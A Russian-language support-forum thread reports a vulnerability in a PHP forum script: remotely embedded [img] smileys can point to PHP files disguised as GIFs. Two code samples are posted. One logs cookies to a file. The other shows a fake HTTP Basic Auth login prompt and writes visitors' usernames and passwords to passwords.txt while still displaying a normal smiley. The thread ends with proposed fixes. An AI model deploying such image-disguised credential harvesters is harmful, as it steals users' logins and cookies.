Уязвимость IMG

•

Здраствуйте Михаил. Опять в тему о уязвимостях. Заметил я вот что...

При добавлении поста в тему...нажал на ссылку "ещё смайлы". Кликнув на один из смайликов, в форму вставился путь (к примеру)
Тоесть я понял то, что возможно вставлять удалённые картинки. Отойдя от тему хочу сказать, что я уже когда-то вёл дискуссию о вреде возможности закачек и удалённых картинок на сайт на всем известном форму PHPBB. так что приведу пример использования этой "уязвимости" в твоём случае.

Представь,у меня есть домен с php хостингом. Создаём небольшой скрипт:

Картинка smile_normal.gif (это у нас будет обычный смайлик)
Вредоносный код (smile.gif) (это у нас будет вредоносный код) Чуть ниже я представлю тебе часть его содержимого.
Файл дополнительной конфигурации htaccess (очень грубо говоря....чтобы запускать расширение gif как php
наша база с награбленным data.txt

Часть вредоносного smile.gif

Код:

<?
error_reporting (0);
//делаем скрипт картинкой
header("Content-type: image/gif");
//делаем изображение смайликом
$image = imagecreatefromgif('smile_normal.gif');

........Вредоносный КОД Тут очень много вариантов

я делал сбор куков и т.д.

//запишем в файл
$f = fopen('data.txt', 'ab'); //data.txt
fwrite($f, $text\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>

Указываем у тебя в посте

У тебя на сайте картинка будет отображаться обычным смайлом, а вот у меня .....

это зависит от содержимого вредоносный КОДа.

Так что я считаю актуальным подумать над этим и предлагаю убрать (на мой взгляд) эту уязвимость.

•

а если у меня не data.txt

•

Цитата:

admin7а если у меня не data.txt

Ну ничего, у меня тоже не data.txt

•

shumee, этот скрипт же не будет работать. Пример есть взлома или кражи данных таким способом?

•

WR

Цитата:

shumee, этот скрипт же не будет работать. Пример есть взлома или кражи данных таким способом?

УВЕРЯЮ ВАС МИХАИЛ РАБОТАЕТ !

Вот тебе один из способ "на дурака" :

Код:

<?
error_reporting (0);
//делаем скрипт картинкой
header("Content-type: image/gif");
//делаем изображение смайликом из архива
$image = imagecreatefromgif('smile.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
//Авторизация пройдёт, если пароль больше 4-ёх символов и вообще написан логин
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="https://www.wr-script.ru - login"');
}

elseif($login)
{
//ставим печеньку, чтобы при повторном заходе авторизации небыло, в самом начале проверка есть ли печенька))
setcookie('LOGON',md5($pass));
//запишем пароли в файл
$f = fopen('passwords.txt', 'ab'); //passwords.txt
fwrite($f, $login." ||| ".$pass."\r\n"); //в формате LOGIN ||| PASSWORD
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>

Если уж есть огромное желание, могу продемонстрировать !

•

Честно говоря форум ломается очень быстро, мне хватило 10 минут на постановку идеи, 30 минут на написание PHPскрипта и 10 секунд на взлом....
а за основу взял всего лишь проверку наличия файла, вытягивание файла себе, редактирование (как захочу, в том числе и пароль админа), и если нужно запись файла назад, и никакой пароль и .htacсess не спасает, проверено на чужом опыте=)))

•

P_a_FF_o_S, хоть поделелси бы своим мега хакерским скриптом для взлома сайта за 10 секунд

Хотелось бы узнать, что я пропустил

•

ясно, проблема серьёзная.

Какие будет предложения по защите от взлома скрипта? На что проверять каждую картинку, что инклюдится на сайт.

•

shumee, ну с шараги прийду чем могу поделюсь, тока жаль не везде катит, короче есть несколько нюансов , их надо просто доработать

•

WR, да было бы идеально вообще убрать возможность инклуда картинки (смайлов). Тоесть сделать доступными только те, что "в базе".

•

и я так думаю

•

а что если в обработку bb-кода вставить строку

Код:

$text=str_replace("[img]http://","",$text);

Бесплатные PHP скрипты - форум техподдержки

Уязвимость IMG